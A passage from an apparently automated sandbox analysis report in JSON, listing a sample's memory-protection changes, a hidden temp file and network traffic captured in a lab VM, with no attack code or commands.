],
"marks":[
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x684e5000"
},
"time":"2020-12-09T15:53:21.765875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":105
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x684d8000"
},
"time":"2020-12-09T15:53:21.765875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":111
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x684d4000"
},
"time":"2020-12-09T15:53:21.812875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":152
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x684a8000"
},
"time":"2020-12-09T15:53:21.812875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":158
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x684e2000"
},
"time":"2020-12-09T15:53:21.843875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":199
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x68488000"
},
"time":"2020-12-09T15:53:21.859875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":205
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x673c1000"
},
"time":"2020-12-09T15:53:22.328875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":605
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":1,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x06767000"
},
"time":"2020-12-09T15:53:22.359875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":642
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":1,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x06767000"
},
"time":"2020-12-09T15:53:22.359875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":645
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x669a9000"
},
"time":"2020-12-09T15:54:20.156875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":1464
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x66900000"
},
"time":"2020-12-09T15:54:22.359875",
"tid":2788,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":1677
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x668c9000"
},
"time":"2020-12-09T15:54:22.390875",
"tid":2788,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":1769
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":1,
"length":65536,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x34d80000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2147
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75506000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2148
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75a74000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2149
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75a73000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2150
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75a75000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2151
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75a73000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2152
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75d17000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2153
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75a73000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2155
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":1,
"length":65536,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x34d80000"
},
"time":"2020-12-09T15:54:25.171875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2282
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x74d87000"
},
"time":"2020-12-09T15:54:25.171875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2283
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x74d81000"
},
"time":"2020-12-09T15:54:25.171875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2284
}
],
"name":"allocates_rwx"
},
{
"families":[
],
"description":"Creates hidden or system file",
"severity":2,
"ttp":{
"T1158":{
"short":"Hidden Files and Directories",
"long":"To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \\u2018hidden\\u2019 file. These files don\\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \\u2013a for Linux and macOS)."
}
},
"markcount":1,
"references":[
],
"marks":[
{
"call":{
"category":"file",
"status":1,
"stacktrace":[
],
"api":"NtCreateFile",
"return_value":0,
"arguments":{
"create_disposition":5,
"file_handle":"0x0000057c",
"filepath":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\~$ckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"desired_access":"0x40100080",
"file_attributes":2,
"filepath_r":"\\??\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\~$ckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"create_options":4194400,
"status_info":2,
"share_access":0
},
"time":"2020-12-09T15:53:21.687875",
"tid":2228,
"flags":{
"create_disposition":"FILE_OVERWRITE_IF",
"desired_access":"FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE",
"create_options":"FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT",
"file_attributes":"FILE_ATTRIBUTE_HIDDEN",
"status_info":"FILE_CREATED",
"share_access":""
}
},
"pid":2204,
"type":"call",
"cid":19
}
],
"name":"creates_hidden_file"
},
{
"families":[
],
"description":"Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time)",
"severity":2,
"ttp":{
},
"markcount":1,
"references":[
],
"marks":[
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":1,
"length":4096,
"protection":32,
"process_handle":"0xffffffff",
"base_address":"0x7ef80000"
},
"time":"2020-12-09T15:53:22.078875",
"tid":2700,
"flags":{
"protection":"PAGE_EXECUTE_READ"
}
},
"pid":2204,
"type":"call",
"cid":420
}
],
"name":"protection_rx"
},
{
"families":[
],
"description":"Generates some ICMP traffic",
"severity":4,
"ttp":{
},
"markcount":0,
"references":[
],
"marks":[
],
"name":"network_icmp"
}
],
"network":{
"tls":[
{
"server_random":"5fd0e4ee8bf9477a3a1f1d5fd6b901a1021860f734bde647444f574e47524400",
"session_id":"1147e31fd36b4ec050984281fd92d8b704520731aa425a115b329f60c11dacdc"
},
{
"server_random":"5fd0e4fa29a895a91b4960ac699334b0ec5dbe05d62a4a24444f574e47524400",
"session_id":"fe6d4573063fb3d8a3eb7c512c544c7e50d6c6c8248b090ce9d93c49e3fb73ae"
}
],
"udp":[
{
"src":"192.168.56.101",
"dst":"192.168.56.104",
"offset":3098,
"time":8.419480085372925,
"dport":58129,
"sport":5355
},
{
"src":"192.168.56.102",
"dst":"192.168.56.104",
"offset":3343,
"time":6.378218173980713,
"dport":137,
"sport":137
},
{
"src":"192.168.56.102",
"dst":"192.168.56.104",
"offset":3828,
"time":8.394395112991333,
"dport":51224,
"sport":5355
},
{
"src":"192.168.56.102",
"dst":"192.168.56.104",
"offset":3981,
"time":8.919831991195679,
"dport":59556,
"sport":5355
},
{
"src":"192.168.56.103",
"dst":"192.168.56.104",
"offset":4224,
"time":14.03511905670166,
"dport":58861,
"sport":5355
},
{
"src":"192.168.56.103",
"dst":"192.168.56.104",
"offset":4379,
"time":14.044678211212158,
"dport":63910,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"104.20.139.65",
"offset":4624,
"time":14.074964046478271,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"151.139.128.14",
"offset":12072,
"time":53.04389500617981,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"162.159.130.233",
"offset":19300,
"time":25.04939317703247,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":92785,
"time":12.614320039749146,
"dport":53,
"sport":49366
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":92872,
"time":12.46611499786377,
"dport":53,
"sport":51865
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":92974,
"time":8.875707149505615,
"dport":53,
"sport":53525
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93070,
"time":7.358427047729492,
"dport":53,
"sport":53894
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93173,
"time":12.999488115310669,
"dport":53,
"sport":55622
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93321,
"time":7.3739330768585205,
"dport":53,
"sport":57211
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93469,
"time":10.010270118713379,
"dport":53,
"sport":58700
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93617,
"time":10.020308017730713,
"dport":53,
"sport":59575
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93720,
"time":12.999208211898804,
"dport":53,
"sport":60001
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93823,
"time":7.373367071151733,
"dport":53,
"sport":64248
},
{
"src":"192.168.56.104",
"dst":"192.168.56.101",
"offset":94244,
"time":6.466797113418579,
"dport":53018,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.101",
"offset":94398,
"time":6.476027011871338,
"dport":56987,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"offset":95367,
"time":6.278124094009399,
"dport":49687,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"offset":95611,
"time":82.47678112983704,
"dport":49887,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"offset":95765,
"time":82.48909616470337,
"dport":61453,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"offset":96009,
"time":6.270061016082764,
"dport":62642,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.103",
"offset":96618,
"time":15.063050031661987,
"dport":52597,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.103",
"offset":96772,
"time":15.056749105453491,
"dport":56273,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.105",
"offset":97016,
"time":10.77050518989563,
"dport":57988,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.105",
"offset":97170,
"time":10.779236078262329,
"dport":64434,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.106",
"offset":97687,
"time":18.637542009353638,
"dport":51312,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.106",
"offset":97841,
"time":18.64597201347351,
"dport":51417,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.255",
"offset":98085,
"time":8.103556156158447,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"192.168.56.255",
"offset":118317,
"time":14.104444026947021,
"dport":138,
"sport":138
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":121727,
"time":30.78724718093872,
"dport":5355,
"sport":49256
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":122047,
"time":47.169366121292114,
"dport":5355,
"sport":49677
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":122367,
"time":9.911517143249512,
"dport":5355,
"sport":49871
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":122687,
"time":36.33794021606445,
"dport":5355,
"sport":50510
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":123007,
"time":60.29358506202698,
"dport":5355,
"sport":51052
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":123327,
"time":41.84375715255737,
"dport":5355,
"sport":51098
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":123647,
"time":8.394129037857056,
"dport":5355,
"sport":51224
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":123853,
"time":27.58063316345215,
"dport":5355,
"sport":51331
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":124173,
"time":8.028341054916382,
"dport":5355,
"sport":51353
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":124501,
"time":49.73521304130554,
"dport":5355,
"sport":51369
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":124821,
"time":82.0536150932312,
"dport":5355,
"sport":51548
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":125237,
"time":17.18865203857422,
"dport":5355,
"sport":53088
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":125557,
"time":11.060317993164062,
"dport":5355,
"sport":53564
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":125853,
"time":52.45841908454895,
"dport":5355,
"sport":54041
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":126173,
"time":55.02798509597778,
"dport":5355,
"sport":54767
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":126493,
"time":19.09524416923523,
"dport":5355,
"sport":55406
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":126813,
"time":16.051506996154785,
"dport":5355,
"sport":55474
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":127109,
"time":10.043001174926758,
"dport":5355,
"sport":57346
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":127429,
"time":44.40907120704651,
"dport":5355,
"sport":58033
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":127749,
"time":8.418867111206055,
"dport":5355,
"sport":58129
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":128045,
"time":25.0122652053833,
"dport":5355,
"sport":58238
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":128365,
"time":14.034866094589233,
"dport":5355,
"sport":58861
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":128571,
"time":13.826195001602173,
"dport":5355,
"sport":59066
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":128891,
"time":8.013374090194702,
"dport":5355,
"sport":59436
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":129235,
"time":6.48179817199707,
"dport":5355,
"sport":59513
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":129563,
"time":8.919373989105225,
"dport":5355,
"sport":59556
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":129859,
"time":38.9073281288147,
"dport":5355,
"sport":60167
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":130179,
"time":21.657960176467896,
"dport":5355,
"sport":60415
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":130499,
"time":33.34561800956726,
"dport":5355,
"sport":62708
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":130819,
"time":57.73856019973755,
"dport":5355,
"sport":62836
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":131139,
"time":6.012407064437866,
"dport":5355,
"sport":63423
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":131483,
"time":62.45176601409912,
"dport":5355,
"sport":63745
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":131803,
"time":11.051077127456665,
"dport":5355,
"sport":63811
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":132009,
"time":14.04456615447998,
"dport":5355,
"sport":63910
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":132305,
"time":14.020031213760376,
"dport":5355,
"sport":64261
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":132625,
"time":9.709530115127563,
"dport":5355,
"sport":64601
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":132945,
"time":16.042737007141113,
"dport":5355,
"sport":65149
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":133151,
"time":16.392513036727905,
"dport":5355,
"sport":65188
},
{
"src":"192.168.56.104",
"dst":"239.255.255.250",
"offset":138874,
"time":82.3661630153656,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"239.255.255.250",
"offset":139090,
"time":81.06078314781189,
"dport":1900,
"sport":52520
},
{
"src":"192.168.56.104",
"dst":"52.109.12.21",
"offset":139854,
"time":17.045016050338745,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"52.109.76.32",
"offset":162375,
"time":20.05421805381775,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"52.109.76.68",
"offset":177490,
"time":14.056312084197998,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":205789,
"time":13.600309133529663,
"dport":53,
"sport":49366
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":206011,
"time":16.574461221694946,
"dport":53,
"sport":49531
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":206275,
"time":20.001517057418823,
"dport":53,
"sport":50099
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":206550,
"time":13.45976209640503,
"dport":53,
"sport":51865
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":206877,
"time":15.999469995498657,
"dport":53,
"sport":52067
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":207083,
"time":68.09831213951111,
"dport":53,
"sport":52517
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":207347,
"time":16.992746114730835,
"dport":53,
"sport":52691
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":207628,
"time":57.591193199157715,
"dport":53,
"sport":52818
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":207832,
"time":19.74304509162903,
"dport":53,
"sport":53506
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":208109,
"time":9.866137027740479,
"dport":53,
"sport":53525
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":208325,
"time":8.350524187088013,
"dport":53,
"sport":53894
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":208531,
"time":52.31289315223694,
"dport":53,
"sport":54857
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":208733,
"time":14.00416612625122,
"dport":53,
"sport":54955
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":208999,
"time":35.90317106246948,
"dport":53,
"sport":55406
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":209352,
"time":13.991150140762329,
"dport":53,
"sport":55622
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":209712,
"time":65.01094818115234,
"dport":53,
"sport":56053
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":209950,
"time":18.94626522064209,
"dport":53,
"sport":56090
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":210184,
"time":8.866774082183838,
"dport":53,
"sport":57211
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":210544,
"time":82.00050210952759,
"dport":53,
"sport":57718
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":210809,
"time":15.998948097229004,
"dport":53,
"sport":58699
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":211169,
"time":11.007613182067871,
"dport":53,
"sport":58700
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":211529,
"time":24.997298002243042,
"dport":53,
"sport":59140
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":211799,
"time":11.007429122924805,
"dport":53,
"sport":59575
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":212005,
"time":13.991252183914185,
"dport":53,
"sport":60001
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":212211,
"time":30.13395404815674,
"dport":53,
"sport":61049
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":212623,
"time":20.001989126205444,
"dport":53,
"sport":61505
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":212904,
"time":24.8245210647583,
"dport":53,
"sport":62098
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":213172,
"time":30.998082160949707,
"dport":53,
"sport":62535
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":213438,
"time":8.366496086120605,
"dport":53,
"sport":64248
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":213798,
"time":36.99377417564392,
"dport":53,
"sport":64961
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":214064,
"time":14.003063201904297,
"dport":53,
"sport":65341
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":214345,
"time":52.99387502670288,
"dport":53,
"sport":65435
},
{
"src":"192.168.56.104",
"dst":"93.184.220.29",
"offset":214603,
"time":20.04487109184265,
"dport":137,
"sport":137
},
{
"src":"192.168.56.105",
"dst":"192.168.56.104",
"offset":219265,
"time":11.060465097427368,
"dport":53564,
"sport":5355
},
{
"src":"192.168.56.105",
"dst":"192.168.56.104",
"offset":219514,
"time":11.051202058792114,
"dport":63811,
"sport":5355
},
{
"src":"192.168.56.106",
"dst":"192.168.56.104",
"offset":219673,
"time":16.051631212234497,
"dport":55474,
"sport":5355
},
{
"src":"192.168.56.106",
"dst":"192.168.56.104",
"offset":219918,
"time":16.043403148651123,
"dport":65149,
"sport":5355
}
],
"dns_servers":[
"8.8.8.8",
"192.168.56.1"
],
"http":[
{
"count":1,
"body":"",
"uri":"http://ocsp.comodoca4.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq",
"user-agent":"Microsoft-CryptoAPI/6.1",
"method":"GET",
"host":"ocsp.comodoca4.com",
"version":"1.1",
"path":"/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq",
